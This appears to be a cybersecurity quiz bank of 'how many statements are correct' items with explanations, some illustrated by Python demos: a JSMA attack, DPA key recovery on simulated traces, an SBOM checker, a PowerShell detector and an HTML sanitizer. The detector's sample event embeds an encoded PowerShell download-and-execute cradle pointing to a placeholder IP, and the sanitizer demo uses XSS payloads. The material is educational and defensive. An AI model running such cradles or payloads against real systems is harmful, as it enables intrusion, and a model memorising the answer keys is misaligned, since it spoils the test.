Consider the following statements regarding Network Intrusion Detection Systems:
1. Network-based Intrusion Detection Systems (NIDS) are typically deployed at strategic points within a network, such as near firewalls or routers, to inspect traffic flowing across the entire subnet.
2. Stateful Protocol Analysis, a technique used in advanced IDS, tracks the state of network connections and verifies that the sequence of packets adheres to the expected protocol standards defined in RFC documents.
3. The concept of 'false positives' in IDS refers to instances where legitimate network traffic is incorrectly flagged as malicious, which can lead to administrative fatigue and reduced system responsiveness.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
Statement 1 is correct because a NIDS sensor is placed at a chokepoint (a SPAN port or tap behind the firewall or at a core router) so that a single sensor sees the traffic of an entire segment. Statement 2 is correct: stateful protocol analysis keeps a state table per connection and compares the observed exchange with a profile of how the protocol should behave (the RFC plus the vendor's model of benign usage), so it can flag what a stateless signature cannot, such as data arriving on a TCP connection that never completed its handshake or a command issued before authentication; being a detection system, it raises an alert rather than blocking the traffic. Statement 3 is correct because a false positive is benign traffic that triggers an alert; a high false-positive rate causes alert fatigue, and analysts who learn to tune out the noise also miss genuine intrusions.
Consider the following statements regarding Post-Quantum Cryptography:
1. The NIST Post-Quantum Cryptography competition concluded in 2020 with the selection of the McEliece cryptosystem as the primary standard for digital signatures.
2. Grover's algorithm provides a quadratic speedup for searching unstructured databases, which necessitates doubling the key sizes for symmetric encryption algorithms like AES-256 to maintain security.
3. The CRYSTALS-Dilithium algorithm is based on the Shortest Vector Problem in lattices and was formally adopted by the European Union Agency for Cybersecurity (ENISA) in 2019.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 2 is correct. Statement 1 is incorrect. Statement 3 is incorrect.
Statement 2 is correct because Grover's algorithm searches an unstructured space of N keys in roughly sqrt(N) steps, so a 2^k brute-force search becomes about 2^(k/2) quantum operations: AES-128 falls to roughly 64-bit quantum security while AES-256 retains roughly 128-bit security, which is why the usual advice is to double symmetric key lengths. Statement 1 is incorrect because the NIST process did not conclude in 2020; NIST announced its first selections in July 2022 (CRYSTALS-Kyber for key establishment, and CRYSTALS-Dilithium, Falcon and SPHINCS+ for signatures) and published the first standards in August 2024. Classic McEliece is a key-encapsulation scheme, not a signature scheme, and was moved into a fourth evaluation round rather than selected. Statement 3 is incorrect because Dilithium's security rests on the Module-LWE and Module-SIS lattice problems (related to, but not literally, the shortest vector problem), and it was standardized by NIST (selected in 2022, published as ML-DSA in FIPS 204 in 2024); ENISA publishes guidance on post-quantum migration but does not adopt cryptographic standards.
Consider the following statements regarding Adversarial Machine Learning in Cybersecurity:
1. The 2017 DeepFool algorithm, designed to compute minimal perturbations, utilizes the curvature of the decision boundary to improve model accuracy during the adversarial training phase.
2. Membership Inference Attacks, formalized in a 2016 study, allow an adversary to reconstruct the original training dataset by exploiting the high confidence scores of models trained on small, non-regularized datasets.
3. The Jacobian-based Saliency Map Attack (JSMA), developed in 2015, relies on the L-infinity norm to constrain perturbations and functions as a black-box method for targeting neural network architectures.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect because DeepFool is an untargeted attack that iteratively finds a minimal perturbation crossing the nearest (linearised) decision boundary to fool a classifier; it is not a training procedure, although adversarial examples from such attacks can be fed into adversarial training. Statement 2 is incorrect because a membership inference attack decides whether a given record was in the training set (exploiting the model's higher confidence on examples it has seen, which overfitting aggravates); it does not reconstruct the training data, which is the goal of model inversion and data extraction attacks. Statement 3 is incorrect because JSMA is a white-box attack: it needs the Jacobian of the model's outputs with respect to the inputs to build a saliency map, and it then modifies a small number of input features (an L0 budget) rather than bounding the change to every feature under the L-infinity norm.
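As an added example (not from the original page), here is a minimal JSMA-style attack in plain Python against a softmax-over-linear model with constructed weights. It shows the two properties the explanation relies on: the attack needs the model's Jacobian (white-box), and it spends an L0 budget, a count of modified features, instead of bounding each feature's change. The weights, bias, input and target class are all made up for the demonstration.

```python
import math

# Constructed 3-class softmax-over-linear model (weights are made up for this example).
W = [
    [ 1.0,  1.0,  0.0, -0.2, -0.2,  0.0],   # class 0
    [ 0.0,  0.0,  1.0,  0.0,  0.0,  0.5],   # class 1
    [-1.0,  0.0,  0.0,  1.1,  1.0,  0.0],   # class 2
]
B = [1.5, 0.0, 0.0]
X0 = [0.0] * 6          # constructed input; features live in [0, 1]

def softmax(z):
    m = max(z)
    e = [math.exp(v - m) for v in z]
    s = sum(e)
    return [v / s for v in e]

def predict_probs(W, b, x):
    logits = [sum(wi * xi for wi, xi in zip(row, x)) + bk for row, bk in zip(W, b)]
    return softmax(logits)

def predicted_class(W, b, x):
    p = predict_probs(W, b, x)
    return p.index(max(p))

def jacobian(W, b, x):
    """J[k][i] = d p_k / d x_i for softmax(Wx + b), in closed form.
    This is the white-box ingredient: JSMA cannot run without model gradients."""
    p = predict_probs(W, b, x)
    n_feat = len(x)
    mean = [sum(p[j] * W[j][i] for j in range(len(W))) for i in range(n_feat)]
    return [[p[k] * (W[k][i] - mean[i]) for i in range(n_feat)] for k in range(len(W))]

def saliency_map(J, target, x, upper=1.0):
    """Saliency of increasing feature i toward `target` (Papernot et al.): a feature
    qualifies only if it raises the target probability (alpha > 0) while lowering
    the other classes' total (beta < 0); its score is alpha * |beta|."""
    n_feat = len(x)
    S = [0.0] * n_feat
    for i in range(n_feat):
        if x[i] >= upper:          # already saturated, cannot be increased further
            continue
        alpha = J[target][i]
        beta = sum(J[k][i] for k in range(len(J)) if k != target)
        if alpha > 0 and beta < 0:
            S[i] = alpha * abs(beta)
    return S

def jsma(W, b, x, target, max_features, upper=1.0):
    """Greedy JSMA: each step saturates the single most salient feature.
    max_features is the L0 budget, i.e. how many features may be touched at all."""
    x = list(x)
    modified = []
    while len(modified) < max_features and predicted_class(W, b, x) != target:
        S = saliency_map(jacobian(W, b, x), target, x, upper)
        best = max(range(len(x)), key=lambda i: S[i])
        if S[best] <= 0:
            break                  # no feature helps any more; the attack stalls
        x[best] = upper
        modified.append(best)
    return x, modified, predicted_class(W, b, x) == target

if __name__ == "__main__":
    adv, touched, ok = jsma(W, B, X0, target=2, max_features=3)
    print("original class:", predicted_class(W, B, X0),
          "adversarial class:", predicted_class(W, B, adv))
    print("features modified (L0 cost):", touched, "success:", ok)
```

With a budget of one feature the attack fails; with two it flips the prediction from class 0 to class 2, touching features 3 and 4 only, which is the L0 behaviour the explanation contrasts with L-infinity attacks.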
Consider the following statements regarding Post-Quantum Cryptography:
1. CRYSTALS-Kyber, selected by NIST in 2022 for general encryption, relies on the hardness of the Module Learning with Errors (MLWE) problem.
2. The Shor's algorithm was first demonstrated on a 5-qubit quantum processor in 2001, and it provides an exponential speedup for searching unstructured databases.
3. The National Institute of Standards and Technology (NIST) initiated the Post-Quantum Cryptography Standardization project in 2016 to identify algorithms capable of resisting quantum computer attacks.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect.
Statement 1 is correct: NIST selected CRYSTALS-Kyber in July 2022, its security reduces to the Module Learning With Errors problem, and it was later standardized as ML-KEM in FIPS 203. Statement 3 is correct because NIST formally launched the project with its December 2016 call for proposals, following its April 2016 report on the post-quantum transition (NISTIR 8105). Statement 2 is incorrect on both counts: Shor's algorithm gives an exponential speedup for integer factorization and discrete logarithms, the problems underlying RSA and (EC)DH, not for unstructured search, which is Grover's quadratic speedup; and the 2001 IBM/Stanford demonstration that factored 15 used a 7-qubit NMR processor, not a 5-qubit one.
Consider the following statements regarding Zero Trust Architecture:
1. The United States Office of Management and Budget (OMB) Memorandum M-22-09, issued in January 2022, directs federal agencies to achieve specific Zero Trust maturity goals by the end of the 2024 fiscal year.
2. The concept of 'Policy Decision Point' (PDP) evaluates access requests, and the architecture involves the integration of hardware-based cryptographic keys at the application layer.
3. The NIST Special Publication 800-207, published in August 2020, formally defines Zero Trust Architecture as a collection of concepts and ideas designed to minimize uncertainty in enforcing accurate, least privilege per-request access decisions.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect.
Statement 1 is correct: OMB Memorandum M-22-09 (26 January 2022) sets out the Federal Zero Trust Strategy and requires agencies to meet specific goals, such as phishing-resistant MFA and complete device inventories, by the end of fiscal year 2024. Statement 3 is correct because NIST SP 800-207 (August 2020) provides the foundational definition of Zero Trust, centred on per-request, least-privilege access decisions made as if the network were already compromised ('never trust, always verify'). Statement 2 is incorrect because, while a Policy Decision Point does evaluate access requests (with a Policy Enforcement Point applying the decision), SP 800-207 describes a logical architecture for policy and access control and does not require hardware-backed cryptographic keys at the application layer; hardware-bound credentials are one possible input to a trust decision, not a defining component.
Consider the following statements regarding Side-Channel Attacks:
1. The Rowhammer effect involves repeatedly accessing adjacent memory rows to induce bit flips in DRAM, and it was first documented by researchers at Carnegie Mellon University in 2014 as a method for bypassing Spectre protections.
2. The Spectre vulnerability, disclosed in 2018, exploits branch prediction and speculative execution in modern microprocessors to leak data from the memory of other applications.
3. Differential Power Analysis (DPA) involves the statistical analysis of power consumption measurements from a hardware device to extract cryptographic keys, a technique first formalized by Paul Kocher in 1999.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect.
Statement 1 is incorrect because of its Spectre claim, not its attribution: the Rowhammer effect was indeed first documented by Carnegie Mellon and Intel researchers (Kim et al., 'Flipping Bits in Memory Without Accessing Them', ISCA 2014), and Google Project Zero showed practical privilege-escalation exploits in 2015. Spectre, however, was not disclosed until January 2018, so a 2014 technique cannot have been devised to bypass Spectre protections, and Rowhammer is a DRAM disturbance fault unrelated to speculative execution. Statement 2 is correct: Spectre abuses branch prediction and speculative execution to read memory across isolation boundaries, leaking the result through cache side channels. Statement 3 is correct: Differential Power Analysis was introduced by Paul Kocher, Joshua Jaffe and Benjamin Jun at CRYPTO 1999 and correlates statistical differences in power traces with hypotheses about key-dependent intermediate values.
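The attack statement 3 describes, as an added example (not code from the original page): it builds the AES S-box from its definition, fabricates noisy power traces under a Hamming-weight leakage model, and recovers the key byte with Kocher's difference-of-means test. The secret key byte, the leakage model, the noise level and the number of traces are constructed for the demonstration.

```python
import random

# --- AES S-box built from its definition: inverse in GF(2^8), then the affine map ---
def gf_mul(a, b):
    """Multiply in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1 (0x11b)."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11B
        b >>= 1
    return r

def gf_inv(a):
    """a^254 == a^-1 in GF(2^8); 0 maps to 0 by convention."""
    if a == 0:
        return 0
    result, base, exp = 1, a, 254
    while exp:
        if exp & 1:
            result = gf_mul(result, base)
        base = gf_mul(base, base)
        exp >>= 1
    return result

def sbox_entry(x):
    b = gf_inv(x)
    s = b
    for _ in range(4):            # s = b ^ rotl(b,1) ^ rotl(b,2) ^ rotl(b,3) ^ rotl(b,4)
        b = ((b << 1) | (b >> 7)) & 0xFF
        s ^= b
    return s ^ 0x63

SBOX = [sbox_entry(x) for x in range(256)]

def hamming_weight(v):
    return bin(v).count("1")

# --- constructed traces: one sample per encryption, HW of the S-box output plus noise ---
def simulate_traces(key_byte, n_traces, seed=7, noise_sigma=1.0):
    rng = random.Random(seed)
    traces = []
    for _ in range(n_traces):
        pt = rng.randrange(256)                       # attacker-known plaintext byte
        power = hamming_weight(SBOX[pt ^ key_byte]) + rng.gauss(0.0, noise_sigma)
        traces.append((pt, power))
    return traces

def dpa_recover_key_byte(traces, bit=0):
    """Difference-of-means DPA (Kocher, Jaffe, Jun 1999). For each of the 256 key guesses,
    split the traces by one bit of the hypothesised S-box output and compare the mean power
    of the two groups. Only the right guess splits the traces in step with the real leakage,
    so it produces a clear peak; wrong guesses average out towards zero."""
    scores = []
    for guess in range(256):
        group0, group1 = [], []
        for pt, power in traces:
            (group1 if (SBOX[pt ^ guess] >> bit) & 1 else group0).append(power)
        if group0 and group1:
            scores.append(abs(sum(group1) / len(group1) - sum(group0) / len(group0)))
        else:
            scores.append(0.0)
    best = max(range(256), key=lambda g: scores[g])
    return best, scores

SECRET_KEY_BYTE = 0x3C    # constructed secret; the attacker only sees plaintexts and power

if __name__ == "__main__":
    traces = simulate_traces(SECRET_KEY_BYTE, 4000)
    guess, scores = dpa_recover_key_byte(traces)
    runner_up = sorted(scores, reverse=True)[1]
    print(f"recovered key byte 0x{guess:02x}; peak {scores[guess]:.2f} vs next best {runner_up:.2f}")
```

Under this leakage model the correct guess yields a difference of means close to 1.0 (the weight of the selected bit), while wrong guesses sit well below it; the same loop, run over every sample point of a real trace rather than one value, is the classic DPA attack on the first AES round.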
Consider the following statements regarding Zero-day vulnerability exploitation:
1. The 2001 Budapest Convention on Cybercrime established a global legal framework that provides for the immediate mandatory disclosure of all zero-day vulnerabilities by private security researchers to their respective national governments.
2. The 2017 WannaCry ransomware attack relied on the EternalBlue exploit, which was a publicly documented vulnerability in the SMBv1 protocol that had been patched by Microsoft in early 2016.
3. The CVSS (Common Vulnerability Scoring System) version 3.1 framework provides a methodology for calculating the economic impact of a zero-day exploit based on the stock market valuation of the affected software vendor.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect because the Budapest Convention harmonizes national computer-crime laws and provides for international cooperation and evidence sharing; it says nothing about researchers disclosing zero-day vulnerabilities to governments. Statement 2 is incorrect on its dates: the SMBv1 flaw that EternalBlue exploits was patched by Microsoft in March 2017 (MS17-010), the exploit was leaked by the Shadow Brokers in April 2017, and WannaCry spread in May 2017, so the vulnerability had been public and patched for about two months, not since early 2016; WannaCry was therefore not a zero-day attack but mass exploitation of unpatched systems. Statement 3 is incorrect because CVSS v3.1 scores technical severity from exploitability metrics (attack vector, attack complexity, privileges required, user interaction) and impact on confidentiality, integrity and availability, with temporal and environmental modifiers; it has no economic or stock-market component.
Consider the following statements regarding Software Bill of Materials:
1. The NTIA published the 'Minimum Elements for a Software Bill of Materials' in July 2021, outlining core data fields such as supplier name, component name, and version string.
2. Executive Order 14028, signed in May 2021, establishes the VEX (Vulnerability Exploitability eXchange) as a mandatory protocol for federal agencies to verify the integrity of open-source libraries.
3. The SPDX specification, ratified as ISO/IEC 5962:2021, functions as a primary mechanism for managing digital rights and automates the patching of vulnerabilities within proprietary cloud environments.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is correct: the NTIA's 'The Minimum Elements for a Software Bill of Materials' (July 2021) names seven baseline data fields (supplier name, component name, version, other unique identifiers, dependency relationship, SBOM author and timestamp) alongside requirements for automation support and practices. Statement 2 is incorrect because EO 14028 directed NTIA to define SBOM minimum elements and NIST to issue software supply-chain guidance; it does not mention VEX, which is a companion document format (developed through NTIA and CISA working groups) by which a supplier states whether a product is affected by a given vulnerability, not a protocol for verifying library integrity. Statement 3 is incorrect because SPDX (ISO/IEC 5962:2021) is a format for describing software components, licences and their relationships; it has nothing to do with digital rights management and does not patch anything.
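Here is an added example (not from the NTIA document or any SBOM tool) that checks a constructed SPDX 2.3 JSON document for the seven NTIA minimum elements; the package names, organisations and purls are invented, and the mapping from NTIA elements to SPDX fields is the one a practitioner would normally use.

```python
import json

# Constructed SPDX 2.3 JSON document; package names, purls and organisations are made up.
SAMPLE_SBOM = json.loads("""
{
  "spdxVersion": "SPDX-2.3",
  "SPDXID": "SPDXRef-DOCUMENT",
  "name": "example-app-sbom",
  "creationInfo": {"created": "2024-01-15T10:00:00Z",
                   "creators": ["Tool: example-sbom-generator-1.0"]},
  "packages": [
    {"SPDXID": "SPDXRef-app", "name": "example-app", "versionInfo": "1.4.2",
     "supplier": "Organization: Example Corp",
     "externalRefs": [{"referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl",
                       "referenceLocator": "pkg:generic/example-app@1.4.2"}]},
    {"SPDXID": "SPDXRef-lib-json", "name": "fastjson-lite", "versionInfo": "2.0.1",
     "supplier": "Organization: Example OSS Project",
     "externalRefs": [{"referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl",
                       "referenceLocator": "pkg:pypi/fastjson-lite@2.0.1"}]},
    {"SPDXID": "SPDXRef-lib-crypto", "name": "tinycrypto", "supplier": "NOASSERTION"}
  ],
  "relationships": [
    {"spdxElementId": "SPDXRef-DOCUMENT", "relationshipType": "DESCRIBES",
     "relatedSpdxElement": "SPDXRef-app"},
    {"spdxElementId": "SPDXRef-app", "relationshipType": "DEPENDS_ON",
     "relatedSpdxElement": "SPDXRef-lib-json"}
  ]
}
""")

IDENTIFIER_REF_TYPES = {"purl", "cpe22Type", "cpe23Type"}
DEPENDENCY_RELATIONSHIPS = {"DESCRIBES", "DEPENDS_ON", "CONTAINS", "DEPENDENCY_OF"}

def _present(value):
    # SPDX permits the literals NOASSERTION / NONE; the NTIA minimum wants a real value.
    return bool(value) and value not in ("NOASSERTION", "NONE")

def ntia_findings(doc):
    """Return a list of gaps against the NTIA (2021) minimum elements: author and
    timestamp at document level; supplier, name, version, unique identifier and a
    dependency relationship for every package."""
    findings = []
    ci = doc.get("creationInfo", {})
    if not ci.get("creators"):
        findings.append("document: missing author (creationInfo.creators)")
    if not ci.get("created"):
        findings.append("document: missing timestamp (creationInfo.created)")

    linked = set()
    for rel in doc.get("relationships", []):
        if rel.get("relationshipType") in DEPENDENCY_RELATIONSHIPS:
            linked.add(rel.get("spdxElementId"))
            linked.add(rel.get("relatedSpdxElement"))

    for pkg in doc.get("packages", []):
        sid = pkg.get("SPDXID") or "<no SPDXID>"
        if not _present(pkg.get("supplier")):
            findings.append(f"{sid}: missing supplier name")
        if not _present(pkg.get("name")):
            findings.append(f"{sid}: missing component name")
        if not _present(pkg.get("versionInfo")):
            findings.append(f"{sid}: missing version")
        has_id = any(r.get("referenceType") in IDENTIFIER_REF_TYPES
                     for r in pkg.get("externalRefs", []))
        if not has_id:
            findings.append(f"{sid}: no unique identifier (purl/CPE)")
        if sid not in linked:
            findings.append(f"{sid}: no dependency relationship links it to the document")
    return findings

if __name__ == "__main__":
    for f in ntia_findings(SAMPLE_SBOM):
        print(f)
```

The third package is the kind of entry that makes an SBOM useless for vulnerability matching: with no version and no purl or CPE there is nothing to look up, and with no relationship nobody can tell whether it ships in the product at all.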
Consider the following statements regarding Advanced Persistent Threats Detection:
1. The MITRE ATT&CK framework, established in 2013, categorizes Advanced Persistent Threat (APT) tactics into 14 distinct stages, ranging from initial reconnaissance to impact.
2. The Cyber Kill Chain model, developed by Lockheed Martin in 2011, includes seven phases of an attack and serves as the primary standard for real-time automated packet filtering in cloud-native environments.
3. Heuristic analysis in APT detection involves identifying suspicious patterns by monitoring system calls, such as the unauthorized use of PowerShell scripts to execute fileless malware.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect.
Statement 1 is correct: MITRE ATT&CK originated in 2013 (and was released publicly in 2015), and the Enterprise matrix currently organizes adversary behaviour into 14 tactics, from Reconnaissance to Impact; these are tactic categories rather than strictly sequential stages, since an intrusion may revisit them in any order. Statement 3 is correct because heuristic and behavioural analysis flags suspicious patterns rather than known signatures, for example an Office application spawning PowerShell with an encoded, hidden-window command line that loads code into memory without writing a file to disk. Statement 2 is incorrect because the Cyber Kill Chain (Lockheed Martin, 2011) is an analytical model of the seven phases of an intrusion, used to plan detection and response; it is not a technical standard and has nothing to do with real-time packet filtering.
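As an added example (not part of the original page or of any vendor's detection content), the following scores constructed process-creation events with simple heuristics for the fileless PowerShell pattern the explanation mentions; the indicator weights, the alert threshold and the sample events are assumptions made for the demonstration, and the remote address uses a documentation range.

```python
import base64
import re

# Constructed process-creation events (fields modelled loosely on Windows event 4688).
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")

EVENTS = [
    {"host": "ws-017", "parent": "WINWORD.EXE",
     "cmd": f"powershell.exe -nop -w hidden -ep bypass -enc {_ENCODED}"},
    {"host": "srv-backup", "parent": "services.exe",
     "cmd": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"host": "ws-042", "parent": "explorer.exe",
     "cmd": "powershell.exe -Command \"Get-Process | Sort-Object CPU\""},
]

ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{20,})", re.I)

# Weighted indicators of fileless / living-off-the-land PowerShell use (assumed weights).
INDICATORS = [
    ("encoded_command", 2, ENCODED_ARG),
    ("download_cradle", 3, re.compile(
        r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression", re.I)),
    ("hidden_window",   2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy_bypass",   2, re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    ("no_profile",      1, re.compile(r"-nop\b|-noprofile\b", re.I)),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ALERT_THRESHOLD = 4     # assumed; one weak indicator alone never alerts

def decode_encoded_command(cmd):
    """-EncodedCommand carries base64 of UTF-16LE text; decode it so the rules
    see the real script instead of an opaque blob."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(event):
    decoded = decode_encoded_command(event["cmd"])
    text = event["cmd"] + ("\n" + decoded if decoded else "")
    hits, score = [], 0
    for name, weight, rx in INDICATORS:
        if rx.search(text):
            hits.append(name)
            score += weight
    if event["parent"].lower() in OFFICE_PARENTS:    # Office spawning a shell
        hits.append("office_parent")
        score += 3
    return {"host": event["host"], "score": score, "hits": hits,
            "alert": score >= ALERT_THRESHOLD, "decoded": decoded}

if __name__ == "__main__":
    for ev in EVENTS:
        r = analyze(ev)
        print(f"{r['host']}: alert={r['alert']} score={r['score']} hits={r['hits']}")
```

The download cradle in the first event is only visible after decoding the -enc argument, which is why the decoding step sits before the rules; the nightly backup script collects a single weak indicator and stays below the threshold.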
Consider the following statements regarding Cross-Site Scripting Mitigation:
1. The DOMPurify library, released in 2014, utilizes a whitelist-based approach to sanitize HTML input and mitigate stored Cross-Site Scripting risks in single-page applications.
2. The HTML5 'sandbox' attribute for iframes, introduced in the 2014 specification, disables the execution of inline scripts and prevents the execution of external scripts from the same origin.
3. The SameSite cookie attribute, proposed in a 2016 IETF draft, provides a mechanism to restrict cookie transmission during cross-site requests, thereby reducing the impact of reflected Cross-Site Scripting.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect.
Statement 1 is correct: DOMPurify (Cure53, 2014) parses untrusted HTML with the browser's own DOM, keeps only elements and attributes on an allow-list and drops everything else, which is the right model for sanitizing user-supplied markup before it is inserted into a page. Statement 3 is accepted as correct for its description of the mechanism: SameSite, first specified in a 2016 IETF draft, stops the browser attaching cookies to cross-site requests, which is chiefly a CSRF defence; its value against reflected XSS is limited, because an injected script runs inside the vulnerable origin and issues same-site requests, so output encoding, sanitization and a Content Security Policy remain the primary XSS controls. Statement 2 is incorrect because a sandboxed iframe without the allow-scripts keyword blocks all script execution, inline and external alike; it also places the document in a unique opaque origin unless allow-same-origin is present, so the distinction the statement draws between inline scripts and 'same-origin' external scripts does not exist. The attribute was also implemented in browsers and present in HTML5 drafts well before the 2014 W3C Recommendation.
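To illustrate the allow-list model, here is an added example (not DOMPurify's code; a stdlib-only illustration that is no substitute for a vetted sanitizer such as DOMPurify in the browser or a maintained server-side library): it parses untrusted HTML with Python's html.parser, re-emits only allow-listed tags and attributes, rejects dangerous href schemes, and entity-escapes all text. The tag and scheme lists are assumptions chosen for the demo.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allow-list: tag -> attributes permitted on it. Everything else is dropped.
ALLOWED_TAGS = {"p": set(), "b": set(), "i": set(), "em": set(), "strong": set(),
                "ul": set(), "ol": set(), "li": set(), "a": {"href", "title"}}
SAFE_SCHEMES = {"http", "https", "mailto"}
_CONTROL_AND_SPACE = re.compile(r"[\x00-\x20\x7f]")

def safe_href(value):
    """Accept relative URLs and a few schemes. Browsers strip tabs and newlines before
    resolving a URL, so strip them first or 'java\\tscript:' slips past the check."""
    cleaned = _CONTROL_AND_SPACE.sub("", value)
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES

class AllowListSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)   # entities decoded, so &#106;avascript: is seen as javascript:
        self.out, self.open_tags, self.drop_depth = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.drop_depth += 1                  # drop the element *and* its text
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return                                # unknown tag dropped; its text survives via handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue                          # this is what removes onerror=, onclick=, style=, ...
            if name == "href" and not safe_href(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        if tag == "a":
            kept.append(' rel="noopener noreferrer"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.drop_depth = max(0, self.drop_depth - 1)
            return
        if self.drop_depth or tag not in self.open_tags:
            return
        while self.open_tags:                     # close anything still open inside it: output stays balanced
            closed = self.open_tags.pop()
            self.out.append(f"</{closed}>")
            if closed == tag:
                break

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data, quote=False))

    def result(self):
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)

def sanitize(untrusted_html):
    parser = AllowListSanitizer()
    parser.feed(untrusted_html)
    parser.close()
    return parser.result()

if __name__ == "__main__":
    for sample in ('<p>Hi <b>there</b><script>alert(1)</script></p>',
                   '<img src=x onerror=alert(1)>',
                   '<a href="javascript:alert(1)" onclick="x()">click</a>'):
        print(repr(sample), "->", repr(sanitize(sample)))
```

The important design choice is that the code never looks for bad things: `<img onerror>` is removed not because onerror is recognised but because img is not on the list, which is why a deny-list of known-dangerous tags is the wrong model for this problem.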
Consider the following statements regarding End-to-end encryption protocols:
1. The Matrix protocol, an open standard for decentralized communication, supports end-to-end encryption via the Olm and Megolm cryptographic ratchets.
2. RFC 8446 defines the TLS 1.3 protocol, which removed support for legacy cryptographic algorithms like SHA-1 and RC4 to enhance security in end-to-end communications.
3. Curve25519 is an elliptic curve used in the Ed25519 digital signature algorithm, providing 128 bits of security and high performance in end-to-end encrypted systems.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
All three statements are correct. Matrix encrypts pairwise device-to-device sessions with Olm, an implementation of the Double Ratchet, and room messages with Megolm, a sender-key ratchet in which each sender advances a one-way ratchet and shares its state with recipients over Olm; this gives forward secrecy for ratchet state and lets recipients decrypt without per-message pairwise traffic. TLS 1.3 (RFC 8446, 2018) removed RC4, DES/3DES, MD5 and SHA-1 (for signatures), static RSA and DH key exchange, CBC-mode ciphersuites and compression; strictly, it secures a transport hop between client and server rather than end-to-end between users. Curve25519 provides the X25519 Diffie-Hellman function, and the birationally equivalent edwards25519 curve underlies the Ed25519 signature scheme; both target roughly 128-bit security and are used in end-to-end encrypted systems such as Signal and Matrix.
Consider the following statements regarding Data Loss Prevention mechanisms:
1. The ISO/IEC 27001:2013 standard incorporates the General Data Protection Regulation (GDPR) Article 32 requirements as a mandatory baseline for all organizations seeking certification in cloud-based data loss prevention.
2. Data-in-motion protection mechanisms often utilize the TLS 1.3 protocol, which was finalized by the IETF in 2018 and includes native support for deep packet inspection of encrypted traffic without the need for man-in-the-middle proxies.
3. The NIST Special Publication 800-122, published in 2010, defines personally identifiable information (PII) and provides a framework for protecting such data through de-identification techniques within enterprise DLP systems.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect.
Statement 3 is correct: NIST SP 800-122 (2010) defines PII, explains how to assess its confidentiality impact level, and covers de-identification and anonymization as protective measures. Statement 1 is incorrect because ISO/IEC 27001 is a generic information security management system standard; it does not incorporate GDPR Article 32 as a certification baseline (ISO/IEC 27701 is the privacy extension, and even it is not a GDPR certification). Statement 2 is incorrect because TLS 1.3 makes passive inspection harder, not easier: it mandates ephemeral (EC)DHE key exchange and drops the static RSA key exchange that let a middlebox holding the server's private key decrypt captured traffic, and it encrypts most of the handshake, so inspecting TLS 1.3 traffic requires either a TLS-terminating (man-in-the-middle) proxy or decryption at the endpoint.
Consider the following statements regarding Hardware Security Modules:
1. Hardware Security Modules (HSMs) are physical computing devices that safeguard and manage digital keys, often complying with the FIPS 140-2 Level 3 standard for tamper-resistance.
2. The PKCS #11 standard, originally developed by RSA Laboratories in 1994, serves as a widely adopted application programming interface for interacting with cryptographic tokens like HSMs.
3. The Common Criteria for Information Technology Security Evaluation, established in 1999, provides the primary framework for certifying the physical hardware architecture of HSMs against electromagnetic side-channel attacks.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is incorrect.
